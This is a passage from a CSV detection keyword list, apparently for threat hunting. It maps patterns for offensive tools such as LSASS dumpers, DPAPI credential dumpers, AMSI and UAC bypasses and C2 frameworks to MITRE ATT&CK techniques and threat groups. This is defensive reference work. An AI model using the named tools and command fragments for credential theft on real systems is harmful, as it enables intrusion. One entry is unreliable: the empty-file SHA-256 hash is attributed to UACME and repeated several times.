and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_VAULT_INTERNET_EXPLORER*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_VAULT_NGC_LOCAL_ACCOOUNT*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_VAULT_WIN_BIO_KEY*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_webconf*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_webpass*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. 
and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_wifi_wpa_*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_WPA-PBKDF2-PMKID_EAPOL.hashcat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dump_WPA-PMKID-PBKDF2.hashcat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*DumpBrowserHistory*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*dumpcap -*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - 
T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*DumpCreds*","offensive_tool_keyword","DumpCreds","Dumpcreds is a tool that may be used to extract various credentials from running processes. I just take a look at mimipenguin(https://github.com/huntergregal/mimipenguin) and tried to improve it a bit","T1055 - T1003 - T1216 - T1002 - T1552","TA0002 - TA0003 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/ponypot/dumpcreds","1","1","N/A","N/A","1","4","1","2019-10-08T07:26:31Z","2017-10-10T12:57:42Z" +"*-DumpCreds*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*dumpCredStore.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert.bin*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*dumpert.dmp*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. 
This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert.exe*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert.exe*","offensive_tool_keyword","Dumpert","Dumpert. 
an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert.git*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z"
+"*dumpert.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*dumpert_path=*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*Dumpert-Aggressor*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z"
+"*Dumpert-Aggressor*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z"
+"*dumpertdll*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*Dumpert-DLL*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z"
+"*-DumpForest *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*dumplsass*","offensive_tool_keyword","WinPwn","Automation for internal Windows 
Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*dumpntlm.py*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z"
+"*DumpNTLMInfo.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*DumpProcessByName*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z"
+"*DumpShellcode.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*DumpShellcode.exe*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z"
+"*DumpShellcode\*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*DumpSMSAPassword*","offensive_tool_keyword","BloodHound","an adversary with local admin access to an AD-joined computer can dump the cleartext password from LSA secrets of any sMSAs 
installed on this computer","T1003.001 - T1078 - T1558.002","TA0006 - TA0004 - TA0003","N/A","N/A","AD Enumeration","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z"
+"*dumpVaultCredentials.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
+"*dumpXor.exe *","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z"
+"*-e --enumerate google*github*k8s --github-only-org --k8s-get-secret-values --gcp-get-secret-values*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","0","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z"
+"*-e ZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA=*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z"
+"*E09F4899-D8B3-4282-9E3A-B20EE9A3D463*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","0","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z"
+"*e0be14373098896893f34e02dfe84d3eb64e11d9d9f7f70a15101b41cf9ae5bd*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*E11DC25D-E96D-495D-8968-1BA09C95B673*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","0","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z"
+"*e1cd2b55-3b4f-41bd-a168-40db41e34349*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
+"*e1ff2208b3786cac801ffb470b9475fbb3ced74eb503bfde7aa7f22af113989d*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*E2E64E89-8ACE-4AA1-9340-8E987F5F142F*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z"
+"*e333ccfe9c22eab91abd3ca224c70741e8619bb00353ea3bc4ea9d9f007cdf85*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
